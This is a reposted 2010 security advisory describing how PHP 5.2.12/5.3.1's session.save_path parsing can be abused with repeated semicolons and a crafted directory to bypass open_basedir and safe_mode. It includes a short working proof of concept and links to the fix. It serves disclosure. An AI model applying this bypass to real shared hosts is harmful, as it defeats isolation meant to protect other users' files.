PHP 5.2.12 / 5.3.1 safe_mode / open_basedir Bypass

kingforce

[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]　　Credit: Grzegorz Stachowiak
　　Provided by: SecurityReason.com
　　Date:
　　- Written: 31.01.2010
　　- Public:  11.02.2010
　　SecurityRisk: Medium
　　Affected Software:
　　PHP 5.2.12
　　PHP 5.3.1
　　Advisory URL: http://securityreason.com/achievement_securityalert/82
　　Vendor: http://www.php.net
　　--- 0.Description ---
　　PHP is an HTML-embedded scripting language. Much of its syntax is
　　borrowed from C, Java and Perl with a couple of unique PHP-specific
　　features thrown in. The goal of the language is to allow web developers
　　to write dynamically generated pages quickly.

　　A visitor accessing your web site is assigned a unique>
　　session>　　propagated in the URL.
　　session.save_path defines the argument which is passed to the save
　　handler. If you choose the default files handler, this is the path where
　　the files are created. Defaults to /tmp. See also session_save_path().
　　There is an optional N argument to this directive that determines the
　　number of directory levels your session files will be spread around in.
　　For example, setting to '5;/tmp' may end up creating a session file and
　　location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If .
　　In order to use N you must create all of these directories before use. A
　　small shell script exists in ext/session to do this, it's called
　　mod_files.sh. Also note that if N is used and greater than 0 then
　　automatic garbage collection will not be performed, see a copy of
　　php.ini for further information. Also, if you use N, be sure to surround
　　session.save_path in "quotes" because the separator (;) is also used for
　　comments in php.ini.
　　---- 1. session.save_path safe mode and open basedir bypass ---
　　session.save_path can be set via ini_set(), session_save_path()
　　functions. In session.save_path there should be path where you will save
　　yours tmp files. But syntax for session.save_path is:
　　[/PATH]
　　OR
　　[N;/PATH]
　　N - can be also a string (N should be numeric).
　　EXAMPLES:
　　1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
　　2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
　　The main problem came when we use multiple ';' character and when we
　　will create fake directory structure to reduce '../'.
　　Proof of Concept:
　　0. Create directories:
　　/humhum
　　and
　　/byp
　　1. set open_basedir = /byp
　　2. create test.php
　　{
　　session_save_path("/humhum");
　　session_start();
　　}
　　3. php test.php
　　Warning: session_save_path(): open_basedir restriction in effect.
　　File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php
　　on line 3
　　4. subdir.php
　　{
　　mkdir("puf");
　　mkdir(";a");
　　}
　　5. php subdir.php
　　6. cd puf
　　7. create byp.php
　　{
　　session_save_path(";;/byp/;a/../../humhum");
　　session_start();
　　}
　　8. php byp.php
　　9. ls /humhum
　　sess_d905eb71c9ad65ce2a845cdb0fed3016
　　The main problem is located in session.c. PHP doesn't check, that we
　　have used next ';' after first. Creating fake directory structure
　　mkdir ';a'
　　mkdir '../;a'
　　we can reduce directory level using '../' .
　　--- 2. Fix ---
　　Revision 294272
　　http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log
　　http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log
　　--- 3. Credit ---
　　Founded by: Grzegorz Stachowiak
　　Written by: Maksymilian Arciemowicz
　　Fixed by  : Ilia Alshanetsky
　　--- 4. Contact ---
　　Email:
　　- Grzegorz.Stachowiak
　　stachowiak [a,t} analogicode (d_0t} pl
　　- Maksymilian Arciemowicz
　　cxib {a.t] securityreason [d0_t} com
　　GPG:
　　http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
　　http://securityreason.com/
　　http://securityreason.com/exploit_alert/ - Exploit Database
　　http://securityreason.com/security_alert/ - Vulnerability Database